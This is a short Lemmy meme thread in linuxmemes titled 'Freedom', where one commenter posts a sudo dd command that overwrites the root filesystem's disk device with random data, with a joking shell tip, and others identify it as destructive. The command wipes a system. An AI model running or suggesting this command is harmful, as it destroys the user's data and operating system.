azha@lemm.ee to linuxmemes@lemmy.worldEnglish · 2 months agoFreedomlemm.eeexternal-linkmessage-square66linkfedilinkarrow-up1923arrow-down10
arrow-up1923arrow-down1external-linkFreedomlemm.eeazha@lemm.ee to linuxmemes@lemmy.worldEnglish · 2 months agomessage-square66linkfedilink
minus-squareImplyingImplications@lemmy.caBannedlinkfedilinkarrow-up60·edit-227 days agoRemoved by mod
minus-squarecogman@lemmy.worldlinkfedilinkarrow-up25·edit-22 months agosudo dd if=/dev/urandom of=$(df | grep '\s/$' | cut -d' ' -f1) (Omit the $ if you are using the fish terminal)
minus-squarefeannag@sh.itjust.workslinkfedilinkEnglisharrow-up3·2 months agoOne good use for AI was a great breakdown of what exactly that command does. I like it.
minus-squarestembolts@programming.devlinkfedilinkarrow-up14·edit-22 months ago“Write random shit to root.” There is a reason they call dd the disk-destroyer.
Removed by mod
sudo dd if=/dev/urandom of=$(df | grep '\s/$' | cut -d' ' -f1)
(Omit the
$
if you are using the fish terminal)One good use for AI was a great breakdown of what exactly that command does. I like it.
“Write random shit to root.”
There is a reason they call dd the disk-destroyer.